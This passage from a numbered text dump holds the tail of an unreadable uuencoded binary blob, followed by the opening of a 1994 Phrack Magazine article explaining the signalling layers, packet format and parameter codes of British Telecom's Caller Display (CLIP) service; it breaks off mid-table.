  16292. M;YY$"Y*A'8`+VRV.W(SCI7.ZY?WDL0:"&64Q@;]B9`QGG'N?Y5<$FR9.RNCAM
  16293. MKBYEN;D8+;LX7/7-30V-[<PM<^5(43"[\<#/3GI7H:11R:R9(L*N-SSL79R,1
  16294. M8^4>_O4B:+*3A760@9ZCC_ZU1S\I2A<@:&2-@H=2",X4<?2I8KF*W)9+9"?4V
  16295. M_,:;UV!:#FN+"12)('20DG>6Z>PID=K#<$&-U7_9W<TKRCN.RD,>PQ,R`$$`G
  16296. M=N>:8=.N`RC'S'/&?2J51=27#L16]Y=6OSVTI3/=:G?6)YF)NP+C/:3C^6*;D
  16297. M@F[]1*30C7EM*A3[-%%SGY<@?7K4<D5NP!1\D\G)P*%S(-&1,@0X3&#W!J/9E
  16298. M&3RK'\<52))4N2B[(Y)$7H<&G%UE.Z2[D8CIE*5K=!W'.860E?*`1<<J<M439
  16299. M)#O^5@P(XXQBC4-".3:AY11CTYJ"0XX"@52$Q8;B6+=Y+E=PPV#U%"R,D>PA?
  16300. M2,Y&1T/UZT6079*EW,%\MCO0]G&16_;:U$EK)M@22ZD7;YK#''ICTZUC4IWVU
  16301. M-:<[;F=+J,A,K1BW0$D<)R,]AWJ?3X))K\F2TRNTY/F;?F]<^_I2:48[C3;9F
  16302. MLQ6EU;SW`EDM8%)&0C_,PSP#^E2PW$5M',)3Y@RS#$>U8L\X)Z$USOWMC=:;@
  16303. MD0FT^^/D+*9GD`^XO`]C4$5M;Z?,1;2-&S,%1_-`&['0=OSJES+W6*R>I<N;@
  16304. M^WC$3M@AF/WUZCJ>#QZ>E17&OZ>)F67<67.0F1S@#`P<8Q4JG)[#<XK<8MQI4
  16305. MU^&WV;PE@&4LX42`^G//>JES;Z.S!C<)&IZG=G/Y5I%SB[;D-0:NP3P[I]T@7
  16306. M>WNV*-T((/\`.J+^'G#$(9&5>K;<BM%6=[-$.BNA`V@W`*@,IW#/7`_,XI\W.
  16307. MAZXC5#%^]R.2&`VG\:T]M$GV+->)SIZ_)&\;.,,Q`&?8$<GH>33EOE$?SHR!#
  16308. MB6Y/+<#\A_GO7-:^IJM-!L5\X7<\68T'0.<EC^6>]0M/?7`,ZW,H5220LN`2,
  16309. M?4^WH/TII).[$VWH3_;+B$/OG"OT+*3@$YR<G_(-5TDGPZQ;G)`W.Q'+<G-)A
  16310. M)#NQL#RM&#=21N,XV(F[@G]>],:XD\U@?W,8^;RX3ESVR3T`_P`XJ[*Y-W8=D
  16311. M'<3S,A>2,`@LYE?=D\GDXYSP.*3[3<?:/.N9R9@I"I$-J)GCG/7KBE9!=DEH=
  16312. M)%B4MN4@'9';KP3Z<\'L?P-)]LO'5("$C5FW[1@L<8`'H,_Y]RR;'JD02K&D+
  16313. MT=Q<-*^[+.NPXQQP#GCKV_K4D\5]=A8((1"TI9RJD<+V'/0#^=.ZT;)UU2(89
  16314. M8[BQC,5Q=;8Y#\R`YQ@=3R,XZ8YJ8ZM&;RWE@,[8;&"^69<#(('X#'3WXIM<C
  16315. MVJ0D^569IM+*MK+<SQ(&?YBC8'R_W68]?]T?K3]*O;R*!(+2SBC1P26==J\=_
  16316. M>.IQD=<5C9-/70UN[C6C6:XA:\BB(+%L)RK#`X(SC^?05N&]2+9&B+$B_+GDN
  16317. M#:!T"BHEK9%I6U9#'JUA9".WM[<R1M\Q*K_#T'/K_2IEOX&:*5[3#;CMVL1UY
  16318. M/IT!J>5K5CNBXFHM*1ML<C&]G=@!Z#`]?\14,FOVEG=E2ZE^A,;<<8R,GJ>:X
  16319. M2BWL%TB(ZL9Y\?9_*1,MO!#$GM^%6(]6;R75(61`1^]D(.0`<D@=NOOBBP$<3
  16320. M.HM.X"QI)"/F;:W7GYFR>.N!CWZ^L$\MUJ-UM:6*.VC(&R.(MC@J",\=_P`*%
  16321. M$DGJ#%:)[HRHMA;11QDE;B?YR,=PN/KZ\U!I^E3+<7$^HK'##D[+:",9;'W=Z
  16322. MQ]>1Q_*J4DE9LEK70T([PR0-O2*-50K,@D+[/3YP.HYS_.C^WK"S5%^TQ2L&!
  16323. MPY()8KCMM!YJ>5O8J]BK#JUC=-]KCGWRQIMVG/S`?[.:T5UB-,11QL)%VNXB"
  16324. M4<^_)HE%H+IBV=U<O$[/'+$D?+,0N0QR"%`)]#5%KN+4,3B3;,C%$C+8*\X!6
  16325. M/Y?K22'L2:C=NJ;;B7859<8.&!XZ'K^55(-1@TF+R[56AMXSR53`;MG+8S]!0
  16326. MGOTIJ+:LA.R,]+BZN[X2N27D0@``$C)_B//&<#@\T_5&U*WTZ-;=I(A$</&DO
  16327. M@"L,C`..?48XX`K5<J:1#O8XN.9[:Y+R1+(02"LG/YUI3:]/=@1KN2,C+Q*BQ
  16328. MA`QXRJ^N,#/6NJ4+M,YE*RL:VE164>F;S#Y\N,F->#GGD\8'3ZU%=%EM5)M_6
  16329. M+@5#O']XYZ=>@P>O4]JPN^;4WLE'0E,,#Z=]J6WE6-C^Y,K8+MZ`#/''6L<V`
  16330. M4I16D01A\X&"2OM@9-5"5MR91OL5YK<QK\K&12P5<*1Z^O\`GFI)K"73U$DX5
  16331. M"[A@%2#^?6M>9;&?*Q9HKRV,=U/!-&"05=FQP<X_'`/Y5-O>55+;[:.;]V7'Z
  16332. M1MJX"CUQQG_Z]2[;HI7V9-;Z;:R"ZN%^T+!"01F,'<,\XQW_`$HN=$1Y?*M8@
  16333. M;IWS@L8SM'OG'05'M6GJ5[-6*;^'=048%I-GD?ZL_P`Z@&C:B2!'973'O^Z(8
  16334. MK958/J9.G)$T>A:Q(3LTZ=MIP25Z&M"V\':Q)<A+BT\E3@EF9<*/7@U,JT$M0
  16335. MQJG)[FW'X+@@8^;*'7_:3&3]<G`J)O#]M&(E$L2*<$DKU&<=3^/:N?V[9NJ2W
  16336. M11N?#KRL/)C.&`50%!P3DY^G!Y_2L#5=,FTN?RY<$D9&/2MZ56[Y3*I3Y=2@O
  16337. MQ;;T--=CC!'XUT&`T<=*4#'UH`-Q':E5B!@$B@`R<\4XM(=IW'Y>!STI`3@W\
  16338. M31\F0H!W/`H2\G1N&.<YSUY_QJ;195Y(G;5KI@BM<2%4.0">,T-?3S;]US(-&
  16339. MY^8%S@_A^7Y4O9Q70KG?<2YNKAA$?M%P^SE3OR`>^!54SAE;,\Y)[$\'ZTU%9
  16340. M+9";;W+.GZ@UL?+C$2[\`R39;9[\<X[]ZE@M[!KPFZOU<##,51MKG/(SM_I^T
  16341. M-2TXMM*[*33LF:XEMM*TCS[0/(A=E1IEQO\`<`=,>]16&J:A?RJL;9+<'"\(2
  16342. M/7(]:QY$TY2-N>S447FCNK:61@99'QN"EF);'7``[>YJ5KT!`9'=BI^957G\&
  16343. M:BR>QHG8H1WS&`Y1D/0OEL*,^N<_I5H77E0_/^\"?,RYP_\`GI^=-Q,TRM<ZI
  16344. M@D=K=(CH%9EPRPC(]MQJ12(HED=HL$;458L'\!GJ?6G:R!.[+,GV8;9)HHF,L
  16345. M@.UL#@XZ#T[8IN8EW(_D?..(X2<Y]">YQ4:E%>.WLMB+$%CD([%R1W)Z\<?S-
  16346. MJ=]-LMO[J(!6'S,A8#!S^/;]*;E)"Y8DRZ5:,T40A!`^^V[!SCG`Z>E)'IT4,
  16347. M<@;:BK)]X.P8$_7_`#TJ7-C4$.O(K>016IN70JW`5]^`>"3CUQU-2_9+215=G
  16348. MP.%)!+X..VWIZTKM(=E<AN-):XN(V#2J"NS$+`D#.<'W)[^E%NME$9[>W@+O$
  16349. MC:QCG(8X_7MVJN9M60N5)EI$-LA:WL!;%`0[R@2,`>X[+CGUJ+[%$ZG?<M))-
  16350. M*V054)GOCCH.GTQ4\WS'RW'36>FKE99I>#T5B2".O`]N]6[>*Q63:BACT*E2V
  16351. MQ'4X[C]:3<FAI),FFE@*&)2D1VXQNR5`'/R_3O5/["L,:,BJJN"%1BSL^,DD)
  16352. M'/H1P/:DG;0;0JPPVT,=U)NA+D*(VP.Q/0D^X^E0SZLK6UNKV8+RO@%FP<\]W
  16353. M!Z].GYU23D2W86*^M(+AUEMPBQ\HTCY9OU)Y/I56XET]+UI1'$D3?.SE<L2"/
  16354. M,!%!YY]?7VH2DGH)M6U)FL)+YHKNW6ZM]RD*/,QM7&?F)Z#V&<YK,OM0U326;
  16355. M,9N97<_><P_*`#U!^IQTIP2D^5A-\JYD.M[[6?-CFL=22:9<MY8YZ'T/U[TEE
  16356. MS>ZU-<"SNK6.624F18>`#D]0`>>E7:%^Q%Y>IKZ5=:@DZ->201D8;:L88J#W!
  16357. MST&<XZ']#3=0N-6O'F%E;I;6PSM5F#,QR`%#'J?0#%9^Y?R-/>L55G*1!;K3(
  16358. MY99C&&A22;S!CN<9K5TR\ADLW6737MKN%-_`#%>>&R>V,]>/PHDM+I@GK:PP[
  16359. MR1WNI"*XC,BLJC:\(R">N".2?RZ&J^H0?91NT2*:/.WS7>0>2P/0\Y]>*$];R
  16360. M/8&M-#4T\7,T/DZS="9XI/D55"J2/3D$\Y[4V2STV*9+H74D9RN)4XR,87``L
  16361. MY/O]*B]G[JT*MIJ3V.G:)"JH\JR.#M$DS#.X=!R>WI[47.E1WRHD=^ZHL85)B
  16362. M4A&(Q[-[Y[4N=WNPMI82/PW.9\W%VDD*2"1(FR%R.K?X57;PY<W$+0RO"T'V^
  16363. MCS,#Y6<#^]C@GG\,4U42V$XB_P#"(6WF?ZE5"LY8E1^\W=N#V^E4(O`]NC;I6
  16364. M/,<J,%!@!CD'()_*J5>2)=*+-$^&6)1?,ECMD;<%BE"\$#Y3@<\J*LS>'K>95
  16365. M8H)4R`RL6`W8`4YSZ^N/4YJ>:^Q5DAD^F6JVO]GQ-+&J*VY<`(NXYZ]N_&3TV
  16366. M]*JZAH#PV\[(9[O=<@)#&%C*#IP23DD''\ZI:;B+`CTZV\MC;1"1%51$!YC$V
  16367. M`#@#IR2!G'7G-5]/T]='MV22]EDC5SL#X`!;KG'6H<W9E**(K[5)6+SO;1"PG
  16368. M1BRRRJ6W8&=R^O?&/Z5%8ZW;HUM'';%BQV1F2/;CG!^G3^7I3Y';<+I.QM'7#
  16369. M(+4^2Z_O2N]5SM)7G&/7I3++5;>XFD9F(+GY1G!P./ZUG9V*L:JWL*(-THY_3
  16370. MVA4@N8F4DL?;N*5Q-%;[4FXPQ^;Y8Y,F,+GZYJRLT!@&)!(.V.?U%.XK&%JQ+
  16371. M3428`\D90<2)(592W3IU)Q[U1DLYI[=7CFE4LZE8XU5Y,=R7/^'\ZM.RU'8TN
  16372. M+SR(`TURYMH/+$BL`21ZDGIGG''J:\^NM=6;5)[R:".YW@A/-[>A[]/2ML/!?
  16373. MN[,:TK6,XN)X@NS;AF8E5R>0/3'''X5"P,@RB'"KDX'2NU:'*R/.#1TZFJ$6T
  16374. M[G3+RUM8[B>!DB<!D8XY![U4'Y4DT]AM-;AGGI5B*6!2=RN/3!%#OT!$K3V[=
  16375. MA`^_Y>H7^*G1W%FH(\I@Q/!)S46ET+YH]2PGV*;C<H/&`14PT^-A^Z"2>P-1A
  16376. MS2CN6HQ>Q"^GNI+>5^[QG(.::]O$$)5GC?'\0.1^5/FOL+DL5Q:3X#+(CY[8&
  16377. M_P`14;"6,%F;RCG`ZKFK33(<6@;S-H1Y"ZCD*')_2B.1DC9(YI$8GE%X'US^C
  16378. M55I;86J!7N"VP3,`3GYGXK174I$C1`\'R\Y1,?Y-1**9<9-%9/NI_NFIH?\`<
  16379. M6-_US;^=3(<2RG_(2?\`W:AM?^/Z'\:@;(=5^[_P%?YU#+_Q\Q_[R_SJX[(EZ
  16380. M[G27?_(0UG_L(2?^AFDA_P"/R?\`ZX#^=8&R*UC_`*C_`+9G_P!"-)IO_+]_V
  16381. MUV/_`*$*;ZDKH:5U_P`@FS_ZZR5R]]_Q[6O^])_.G1_K\1U=C6L/N0_6/^1I?
  16382. M;?\`X]&_W9/Y)28GNAES_P`>K_[XKL--^X?]QO\`T`UG4^$U6Y#>_P#(7B_Z)
  16383. MY2?S%-U7_CYM_P#KE'_Z!41Z#[D7B?\`Y!U]_NG_`-!%2:?_`,M_^O>3_P!&#
  16384. M&A?`@E\1D7/_`"%-0_Z[_P!#4T_4_P"]_05;(1EW?^KE_P![_P!E-7O`W_(2Y
  16385. MC_ZZK_.M)_PV2OC1V+?ZB/\`WW_FE.7_`)#4O_75OY"N)['0MS#TG_7R?[R__
  16386. MRJSJ7_(&_P"WX?\`H)JG\0/8R?#_`/QZ'Z/_`.A5U<'^L;_<G_E53^(2^%&#\
  16387. MX?\`^/.[_P"OD?\`LU+J/_']9_\`763^9H?Q_P!=AK8U;G_C]/T/\J?#_P`A$
  16388. M)?\`?/\`.LP*=K_R$=3_`.O=OYM69KO_`"&+#_=2M8_$*1'HOW1]6_\`0FK5V
  16389. MN?\`D,R_]=%_D:4_C!;(UHNL?^[_`$JQ9]?SK)[@]A\?WI/J*NQ?Z^/\/Y4TQ
  16390. M)CY^@^E-/W&JEN+H0V__`!\CZ'^E<CJ'_(3UOZP?^C!6U,.I7UG_`(^+K_KKA
  16391. M#_Z.>GR_\M/^NA_E4O;^NR&MRWXD_P"0AIO^Y_[-7(S_`/(/A_Z[/_[+5PZ?3
  16392. MUW(74BU+_D88_P#KM5R[_P"0[??[K?R-5T7H+K\RNO\`QX3_`/78_P`EKI/^1
  16393. M6]S_`,"_]!%9U#2(Z'_5Q_\`7,_SJ[8_Q_Y]*R9H:*=&^G]:HVW_`!^R?]=OE
  16394. M\:A=1&;%_P`>5K](?YBN*LO^0S_VT:NRC]HRJ[HR)OOCZ_UH7[XKN.$LVO\`I
  16395. MJYO]RK6@_P#(4M?^NJUG+9FL/B1TGCW_`)"`_P!T_P!:XE>U31^!!4W$[&G];
  16396. MQ]*V,QR]'_W?ZT^3_5GZ+4E%R#[Z_0?RJ]9?ZMO]ZL9;&\337[T7T_I277^J2
  16397. JA_W?ZUS]4:O8P)?];)]!_*H)_NI^-=B.610%+6ID.B_I2G[Z_44#`/_9J
  16398. ``
  16399. end
  16400.                               ==Phrack Magazine==
  16401.  
  16402.                  Volume Six, Issue Forty-Seven, File 19 of 22
  16403.  
  16404.                A Guide To British Telecom's Caller ID Service
  16405.  
  16406.                                    By DrB0B
  16407.                          (DrB0b@grex.cyberspace.org)
  16408.  
  16409.  
  16410.  
  16411. Introduction:
  16412.  
  16413. Whilst caller ID services are old news to American readers, to UK phone-
  16414. phreaks they are a new and potentially exciting addition to British-
  16415. Telecom's network services. Many people will have already read articles
  16416. describing CNID, almost invariably these articles have been based on systems
  16417. utilizing Bellcore's CLASS signalling requirements, it should be
  16418. noted that while BT's Caller Display System is also based on CLASS there
  16419. are some significant technical differences. I have tried to make the
  16420. information in this article as comprehensible as possible, unfortunately the
  16421. telecommunications industry is one of the most jargon-infested industries in
  16422. the world so if you have any questions about anything in this article don't
  16423. hesitate to contact me at the above address, I'll do my best to help.
  16424. BT hope to have their Caller Display Service available by November 1994.
  16425.  
  16426. LATE NEWS: Today, Nov 1st 1994, BT announce that caller ID services would
  16427. be withheld for a while longer as the public are too stupid to understand
  16428. what it means, I swear I'm not making this up. According to BT newsline
  16429. (0800 500005) "The public failed to comprehend that caller display services
  16430. meant that caller number would be transmitted with every call, nor did they
  16431. understand that CDS could be blocked on a per call basis by using the 141
  16432. prefix, or on a per line basis by arrangement with BT. Go figure !
  16433. New date for service launch is towards the end of November.
  16434.  
  16435.  
  16436. (1) What is Calling Line Identification Presentation.
  16437.  
  16438. When BT introduce their Caller Display Service over the analogue local
  16439. access network the first service available will be Calling Line Identification
  16440. Presentation (CLIP), this provides for the delivery of the callers
  16441. number when a telephone call arrives, in the near future it will also
  16442. provide the callers name. When the callers name or number cannot be delivered
  16443. then one of two reasons for the failure will be displayed, (1) name or number
  16444. not available (the caller has an unlisted number), or, (2) name and number
  16445. withheld by customer (this is done by the caller dialling 141 before dialling
  16446. the called number, this results in the message "CLI Withheld" being displayed
  16447. on the recipients equipment). In addition to caller identification the CLIP
  16448. service can also deliver network messages, the time, date, and, (optionally),
  16449. some indication of call type.
  16450. As noted above callers can choose to withhold CLI information by using the
  16451. prefix 141, users should be aware that this has no effect on BT's ability
  16452. to trace a call, the 141 prefix is a service activation code whilst call
  16453. tracing is an operator function.
  16454.  
  16455.  
  16456. (2) Some Necessary Definitions
  16457.  
  16458. From here it gets a bit more complex, your mileage may vary. It's probably
  16459. best if I define some of the terms to be used before going any further.
  16460.  
  16461. Line Reversal
  16462. The potential difference between the two wires of the exchange line (A+B)
  16463. will always be equal to or greater than 15 volts. An incoming Caller
  16464. Display message will be preceded by a polarity reversal between the two wires.
  16465.  
  16466. Idle State Tone Alert Signal
  16467. Signals sent in the idle state will be preceded by a Tone Alert signal and
  16468. a Channel Seizure signal. Terminal equipment may recognize the Idle State
  16469. Tone Alert Signal by the detection of both frequencies together, or by
  16470. detection of a single (the lower) frequency. In the case of single
  16471. frequency detection the recognition time should be not less than 30ms,
  16472. if both frequencies are detected the recognition time can be reduced to not
  16473. less than 20ms.
  16474.  
  16475. Fig 1. The Idle State Tone Alert Signal
  16476.       --------------------------------------------------------------
  16477.       |Frequencies              | 2130 hz and 2750 hz +/- 1%       |
  16478.       --------------------------------------------------------------
  16479.       |Received Signal Level    | -2dBV to -40 dBV                 |
  16480.       --------------------------------------------------------------
  16481.       |AC and DC load impedance | AC load is high impedance as     |
  16482.       |                         | required by NET4                 |
  16483.       --------------------------------------------------------------
  16484.       |Unwanted Signals         | Total power of extraneous signals|
  16485.       |                         | in the voice band (300-3400hz) is|
  16486.       |                         | at least 20dB below the signal   |
  16487.       |                         | levels                           |
  16488.       --------------------------------------------------------------
  16489.       |Duration                 | 88 to 110 msec                   |
  16490.       --------------------------------------------------------------
  16491. Note: NET4 is European Telecommunications Standard ETS 300 001;
  16492. Attachments to PSTN; general technical requirements for equipment
  16493. connected to an analogue subscriber interface in the PSTN).
  16494.  
  16495. DC Load
  16496. NET4 requires that the total of terminal equipment on a line shall not
  16497. draw in excess of 120 microA in the idle state. The Caller Data Service
  16498. terminal equipment may, as an option, draw DC of up to 0.5 mA par device
  16499. at 50 V line voltage, but only during CDS idle state, otherwise the
  16500. conditions of NET4 apply.
  16501.  
  16502. DC Wetting Pulse
  16503. In order to improve reliability of idle state data reception (by reducing
  16504. noise), it is mandatory that the terminal equipment shall draw a short
  16505. pulse of current from the line by applying a resistive load for a
  16506. specified time.
  16507.  
  16508.  
  16509. (3) Signalling
  16510.  
  16511. For an understanding of the processes involve we need to have some under-
  16512. standing of the four layers used in Basic Mode communication. Basic Mode
  16513. communication covers transmission of data between network and terminal
  16514. equipment, either before ringing is applied or without any ringing,
  16515. transmission is either down-stream (network to terminal equipment), or
  16516. up-stream (terminal equipment to network).
  16517.  
  16518. Physical Layer: This defines data symbol encoding and modulation, and
  16519.                 analogue line conditions.
  16520. Datalink Layer: This defines framing of messages for transmission and a
  16521.                 simple error checking procedure.
  16522. Presentation Layer: This defines how application-related information is
  16523.                     assembled into a message.
  16524. Application Layer: This defines the application that uses the signalling.
  16525.                    In this case Calling Line Identity Presentation.
  16526.  
  16527. Now we'll go into a little more detail about each of these layers.
  16528.  
  16529.  
  16530. Physical Layer:
  16531.  
  16532. Signalling may occur in either the idle state or loop state. We won't
  16533. discuss loop state signalling here, as it's not pertinent at this stage.
  16534. An incoming CDS call is indicated by a polarity reversal on the A and B
  16535. wires, usually followed by ringing current applied to the B wire. The
  16536. Terminal Equipment responds to the Idle State Tone Alert by drawing a DC
  16537. wetting pulse and applying a DC load and an AC load. The DC wetting pulse
  16538. is applied during the idle period following the end of the Idle State
  16539. Tone Alert signal. The AC load is applied at the same time as the DC
  16540. wetting pulse. It is removed after the end of the V.23 signals. The DC load
  16541. is applied and removed at the same time as the AC load impedance. On removal
  16542. of the DC and AC loads the CPE reverts to the idle state. For some
  16543. applications the Channel Seizure may be delayed by up to 5 seconds,
  16544. either or both silent periods may be extended in this case.
  16545. If a terminal equipment loop state condition is detected the CDS message
  16546. is aborted and the call presented as a non-CDS call.  All data transmitted
  16547. by the physical layer consists of 8-bit characters transmitted asynchronously
  16548. preceded by one start-bit and followed by one stop bit. With the exception
  16549. of the mark signal immediately following channel seizure there should be
  16550. no more than 10 stop bits between characters.
  16551.  
  16552. Values for octets are given in the following format:
  16553.  
  16554.    S2 M B7 B6 B5 B4 B3 B2 L S1
  16555. (Order of bits S1 first S2 last)
  16556.  
  16557. where S1 = start bit
  16558.  S2 = stop bit
  16559.  M  = most significant bit
  16560.  L  = least significant bit
  16561.  B* = bit numbers 2 to 7
  16562.  
  16563. Octets are transmitted with most significant octet first.
  16564.  
  16565.  
  16566.  
  16567. Datalink Layer:
  16568.  
  16569. The datalink layer provides framing of data into packets that can be
  16570. distinguished from noise, and has error detection in the form of a check-
  16571. sum.
  16572.  
  16573. Fig 2. Datalink Packet Format
  16574.  
  16575.      -------------------------------------------------------------
  16576.      |Channel  |Mark    |Message   |Message   |Message   |Check- |
  16577.      |Seizure  |Signal  |Type      |Length    |          |sum    |                    |         |        |          |          |          |       |
  16578.      -------------------------------------------------------------
  16579.             ^^^^^^^^^^
  16580.            Presentation
  16581.         Layer
  16582.  
  16583.  
  16584. Analysis of the fields in a Datalink Packet:
  16585.  
  16586. Channel Seizure
  16587. The channel seizure consists of a continuous sequence of alternate 0 and 1
  16588. bits at 1200 bits/s. The purpose of channel seizure is to minimize the possibility of noise mimicking a genuine carrier. The length of channel
  16589. seizure as seen by terminal equipment is at least 96 bits (80 msec). It
  16590. may be longer, up to 315 bits (262 msec)
  16591.  
  16592. Mark Signal
  16593. The mark signal seen by terminal equipment is at least 55 bits (45 msec)
  16594. of continuous mark condition (equivalent to a series of stop bits, or no
  16595. data being transmitted).
  16596.  
  16597. Message Type
  16598. The message type is a single binary byte. The value depends on the
  16599. application.
  16600.  
  16601. Message Length
  16602. The message length is a single binary byte indicating the number of bytes in
  16603. the message, excluding the message type, message length, and checksum bytes.
  16604. This allows a message of between 0 and 255 bytes.
  16605.  
  16606. Message
  16607. The message consists of between 0 and 255 bytes, according to the message
  16608. length field. This is the presentation layer message (explained later).
  16609. Any 8-bit value may be sent, depending on the requirements of the
  16610. presentation layer and the application.
  16611.  
  16612. Checksum
  16613. The checksum consists of a single byte equal to the two's complement sum
  16614. of all bytes starting from the "message type" word up to the end of the
  16615. message block. Carry from the most significant bit is ignored. The
  16616. receiver must compute the 8-bit sum of all bytes starting from "message
  16617. type" and including the checksum. The result must be zero or the message
  16618. must be assumed to be corrupt.
  16619.  
  16620.  
  16621.  
  16622. Presentation Layer:
  16623.  
  16624.  
  16625. Fig 3. Presentation Layer Message format
  16626.      -------------------------------------------------------------------
  16627.      |Parameter|Parameter|Parameter| ... |Parameter|Parameter|Parameter|
  16628.      |Type     |Length   |Byte(s)  |     |Type     |Length   |Byte(s)  |
  16629.      -------------------------------------------------------------------
  16630.  
  16631. The fields Parameter Type, Length, and Byte, together describe one
  16632. presentation layer parameter, and may be repeated.
  16633. Parameter Type will be discussed more fully in the next section.
  16634. Parameter Length is a single binary byte of a value between 0 and 255. In
  16635. Basic Mode a complete message must be contained within a single datalink
  16636. packet, this means that the total length of presentation layer parameters
  16637. must not exceed 255 bytes.
  16638. Parameter Byte(s) contains zero or more bytes of application related
  16639. information. The information contained in this parameter should be en-
  16640. coded in BT ISDN Character Set IA5 format.
  16641.  
  16642.  
  16643. Parameter Type:
  16644.  
  16645. There are eight parameter types associated with CLIP
  16646.  
  16647.  
  16648.  
  16649.  
  16650. Fig 4. Parameter Type values
  16651.        -------------------------------------------------------------
  16652.        | Parameter Type Value  | Parameter Name                    |
  16653.        -------------------------------------------------------------
  16654.        | 00010001              | Call Type                         |
  16655.        -------------------------------------------------------------
  16656.        | 00000001              | Time & Date                       |
  16657.        -------------------------------------------------------------
  16658.        | 00000010              | Calling line directory number (DN)|
  16659.        -------------------------------------------------------------
  16660.        | 00000011              | Called directory number           |
  16661.        -------------------------------------------------------------
  16662.        | 00000100              | Reason for absence of DN          |
  16663.        -------------------------------------------------------------
  16664.        | 00000111              | Caller name/text                  |
  16665.        -------------------------------------------------------------
  16666.        | 00001000              | Reason for absence of name        |
  16667.        -------------------------------------------------------------
  16668.        | 00010011              | Network message system status     |
  16669.        -------------------------------------------------------------
  16670.  
  16671.  
  16672. The calling line directory number is the number of the line from which the
  16673. call was made, or a substitute presentation number. The called directory
  16674. number is the number that was called. This is of significance when the call
  16675. has been diverted.
  16676. There may be parameters of other types present. the call type parameter, if
  16677. present will always be sent first, other parameters may be sent in any
  16678. order. at least seven of these eight parameters must be recognized for the
  16679. CLIP service (Called directory number is not necessary). Parameters may be
  16680. sent with zero length. In such cases parameter length will be zero and the
  16681. checksum will be correct. Parameters are usually encoded in IA5. The
  16682. version used is a 7-bit code and is sent in 8-bit bytes with the most
  16683. significant bit set to zero. Non-displayable characters (codes 0-32
  16684. decimal) are not used. In the tables following byte number 1 is sent first
  16685. followed by byte number 2 and so on.
  16686.  
  16687.  
  16688. Call Type Parameter
  16689.  
  16690.  ------------------------------------------------------
  16691.  | Byte Number| Contents                              |
  16692.  ------------------------------------------------------
  16693.  | 1          | Call Type Parameter Type Code         |
  16694.  |            | (00010001)                            |
  16695.  | 2          | Parameter Length                      |
  16696.  | 3          | Call Type                             |
  16697.  ------------------------------------------------------
  16698.  
  16699.  
  16700.  
  16701.  ------------------------------------------------------
  16702.  | Call Type Encoding | Call Type                     |
  16703.  ------------------------------------------------------
  16704.  | 00000001           | Voice Call                    |
  16705.  | 00000010           | ring-back-when-free-call      |
  16706.  | 10000001           | message waiting call          |
  16707.  ------------------------------------------------------
  16708.  
  16709. If the call type parameter is omitted then the call type is "voice call".
  16710. Additional Call Types may be defined later. Other call types, ie FAX, will
  16711. be used when they are available. The "message waiting" call type is used
  16712. to give an indication of a new message from a specific caller.
  16713.  
  16714.  
  16715. Time and Date Parameter
  16716.  
  16717. The Time parameter indicates the date and time (+/- 1 minute) of the event
  16718. associated with the supplementary information message. Where the call type
  16719. has a value 127 (01111111) or less, then the time is the current time and
  16720. can be used to set internal terminal equipment clocks and calendars. For
  16721. a call of type "message waiting" the time and date refer to the time
  16722. message was left or recovered. For other call types with value 128
  16723. (10000000) or greater, the time and date may refer to some unspecified event
  16724. and not necessarily current time.
  16725.  
  16726.  
  16727.  
  16728.  --------------------------------------------------------
  16729.  | Byte Number | Contents                               |
  16730.  --------------------------------------------------------
  16731.  | 1           | Time & Date parameter type code        |
  16732.  |             | (00000001)                             |
  16733.  | 2           | Parameter length (8)                   |
  16734.  | 3           | Month                                  |
  16735.  | 4           | Month                                  |
  16736.  | 5           | Day                                    |
  16737.  | 6           | Day                                    |
  16738.  | 7           | Hours                                  |
  16739.  | 8           | Hours                                  |
  16740.  | 9           | Minutes                                |
  16741.  | 10          | Minutes                                |
  16742.  --------------------------------------------------------
  16743.  
  16744. Calling Line Directory Number Parameter
  16745.  
  16746. The maximum length of number sent is 18 characters. The first digit sent is
  16747. in byte 3. The Calling Line Directory Number is a number that may be used
  16748. to call back the caller, or the same service. It may not be the directory
  16749. number of the originating call, for example, an 0800 may be associated
  16750. with the caller. Where an alternative to the directory number of the caller
  16751. is sent this is known as a Presentation Number. There is no indication of
  16752. which type of number is sent, this may change.
  16753. If only a partial number is known then that partial number may be sent. This
  16754. will be followed by a "-". For instance, where a call comes from outside the
  16755. digital network the area code may still be sent and shown as:
  16756.  
  16757.      0171-250-
  16758.  
  16759. or, (under the new national code) for an international call from France;
  16760.  
  16761.      00 33-
  16762.  
  16763. assuming the new international access code of 00.
  16764.  
  16765.  
  16766.        ---------------------------------------------------------
  16767.        | Byte Number | Contents                                |
  16768.        ---------------------------------------------------------
  16769.        | 1           | Calling Line Directory Number           |
  16770.        |             | Parameter type code (00000010)          |
  16771.        | 2           | Parameter length (n)                    |
  16772.        | 3           | First digit                             |
  16773.        | 4           | Second digit                            |
  16774.        | .           | .                                       |
  16775.        | .           | .                                       |
  16776.        |n+2          | nth digit                               |
  16777.        ---------------------------------------------------------
  16778.  
  16779.  
  16780.  
  16781.  
  16782. Reason for Absence of Directory Number Parameter
  16783.  
  16784.       ------------------------------------------------------------
  16785.       | Byte Number | Contents                                   |
  16786.       ------------------------------------------------------------
  16787.       | 1           | Reason for Absence of DN parameter type    |
  16788.       |             | code (00000100)                            |
  16789.       | 2           | Parameter length (1)                       |
  16790.       | 3           | Reason                                     |
  16791.       ------------------------------------------------------------
  16792. The reason will be one of the following BT IA5-encoded values
  16793.     "P" = "Number Withheld"
  16794.     "O" = "Number Unavailable"
  16795.  
  16796.  
  16797. Called Directory Number Parameter
  16798.  
  16799. The Called Directory Number is the telephone number used by the caller when
  16800. making the call. The maximum length of characters sent is 18, the first digit
  16801. of the number is sent in byte 3, the second in byte 4 and so on.
  16802.  
  16803.  
  16804.        ---------------------------------------------------------
  16805.        | Byte Number | Contents                                |
  16806.        ---------------------------------------------------------
  16807.        | 1           | Called Directory Number Parameter       |
  16808.        |             | type code (00000011)                    |
  16809.        | 2           | Parameter length (n)                    |
  16810.        | 3           | First digit                             |
  16811.        | 4           | Second digit                            |
  16812.        | .           | .                                       |
  16813.        | .           | .                                       |
  16814.        | n+2         | nth digit                               |
  16815.        ---------------------------------------------------------
  16816.  
  16817.  
  16818.  
  16819. Caller Name/Text parameter
  16820.  
  16821. At the launch of the service the Caller Name will not be available, the
  16822. parameter will contain text only.
  16823. The Name/Text consists of between 1 and 20 BT-IA5 characters. The parameter
  16824. may be used for other information when no name is available.
  16825.  
  16826.  
  16827.        ---------------------------------------------------------
  16828.        | Byte Number | Contents                                |
  16829.        ---------------------------------------------------------
  16830.        | 1           | Caller Name/Text Parameter type code    |
  16831.        |             | (00000111)                              |
